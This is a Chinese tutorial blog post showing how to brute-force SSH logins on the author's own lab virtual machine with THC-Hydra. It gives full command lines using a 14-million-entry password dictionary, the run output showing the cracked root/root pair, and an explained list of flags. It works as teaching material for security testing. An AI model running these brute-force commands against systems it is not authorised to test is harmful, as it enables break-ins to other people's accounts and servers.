hydra笔记-利用hydra暴力破解ssh弱口令
Posted IT1995
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了hydra笔记-利用hydra暴力破解ssh弱口令相关的知识,希望对你有一定的参考价值。
这里我搭了台虚拟机。ssh开放的22端口。用户名密码都是root。
下载windows版本的hydra
GitHub - maaaaz/thc-hydra-windows at v9.1
解压就可以了
这里要自己下载一个字典,也就是这样的。这里面有很多字符串,代表密码,到时候这个软件会一个一个试。
用cmd进如目录:
D:\\hackSoftware\\thc-hydra-windows-v9.1>hydra -l root -o 1.txt -f -P D:\\hackSoftware\\字典\\kali1400万弱口令\\dict.txt ssh://192.168.229.226:22222
运行:
D:\\hackSoftware\\thc-hydra-windows-v9.1>hydra -l root -o 1.txt -f -P D:\\hackSoftware\\字典\\kali1400万弱口令\\dict.txt ssh://192.168.229.226:22222
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-03-17 15:32:42
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.229.226:22/
[STATUS] 177.00 tries/min, 177 tries in 00:01h, 14344223 to do in 1350:41h, 16 active
[STATUS] 136.33 tries/min, 409 tries in 00:03h, 14343991 to do in 1753:33h, 16 active
[STATUS] 116.71 tries/min, 817 tries in 00:07h, 14343583 to do in 2048:15h, 16 active
[STATUS] 118.33 tries/min, 1775 tries in 00:15h, 14342625 to do in 2020:06h, 16 active
[STATUS] 113.84 tries/min, 3529 tries in 00:31h, 14340871 to do in 2099:36h, 16 active
我们换个字典少的:
D:\\hackSoftware\\thc-hydra-windows-v9.1>hydra -l root -o 1.txt -f -P D:\\hackSoftware\\字典\\kali1400万弱口令\\test.txt ssh://192.168.229.226:22
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-03-17 16:09:51
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking ssh://192.168.229.226:22/
[22][ssh] host: 192.168.229.226 login: root password: root
[STATUS] attack finished for 192.168.229.226 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-03-17 16:10:07
D:\\hackSoftware\\thc-hydra-windows-v9.1>
这样就成功暴力破解了。用户名密码都是root。
下面来详细看下其参数:
运行如下:
D:\\hackSoftware\\thc-hydra-windows-v9.1>hydra
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [-m MODULE_OPT] [service://server[:PORT][/OPT]]
Options:
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-C FILE colon separated "login:pass" format, instead of -L/-P options
-M FILE list of servers to attack, one entry per line, ':' to specify port
-t TASKS run TASKS number of connects in parallel per target (default: 16)
-U service module usage details
-m OPT options specific for a module, see -U output for information
-h more command line options (COMPLETE HELP)
server the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
service the service to crack (see below for supported protocols)
OPT some service modules support additional input (-U for module help)
Supported services: adam6500 asterisk cisco cisco-enable cvs ftp[s] http[s]-head|get|post http[s]-get|post-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-cram|digestmd5][s] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey teamspeak telnet[s] vmauthd vnc xmpp
Hydra is a tool to guess/crack valid login/password pairs.
Licensed under AGPL v3.0. The newest version is always available at;
https://github.com/vanhauser-thc/thc-hydra
Please don't use in military or secret service organizations, or for illegal
purposes. (This is a wish and non-binding - most such people do not care about
laws and ethics anyway - and tell themselves they are one of the good ones.)
Example: hydra -l user -P passlist.txt ftp://192.168.0.1
D:\\hackSoftware\\thc-hydra-windows-v9.1>
总结下吧:此工具请不要用于非法用途。
使用例子如下:
hydra -l user -P passlist.txt ftp://192.168.0.1
hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [-m MODULE_OPT] [service://server[:PORT][/OPT]]
-l login or -L File | login是用户名,-L是提供用户名文件,里面可以放多个用户名 |
-p PASS or -P File | PASS是一个密码,File是提供密码文件,也就是字典 |
-C File | 冒号分割的形式 “用户名:密码”,这个格式代替 -L/-P参数 |
-M File | 列出需要攻击的服务,一行一条,“:”后面放端口号 |
-t Tasks | 并发数,也就是线程,默认是16个 |
-U | 服务模块使用详情 |
-m OPT | 选择特定的模块,-U查看输出详情 |
-h | 帮助 |
server | 目标服务名:如:DNS、IP、网段 |
service | 破解服务 |
OPT | 一些服务模块支持额外输入 |
-o | 输出文件 |
-f | 破解成功(一次)后就退出 |
目前简单介绍到这里,下面来看下命令:
hydra -l root -o 1.txt -f -P dict.txt ssh://192.168.229.226:22
用户名为root
破解数据输出到1.txt文件中
破解弱口令后就退出了
字典文件为dict.txt
破解ssh协议,ip地址为192.168.229.226端口号为22
创作打卡挑战赛 赢取流量/现金/CSDN周边激励大奖以上是关于hydra笔记-利用hydra暴力破解ssh弱口令的主要内容,如果未能解决你的问题,请参考以下文章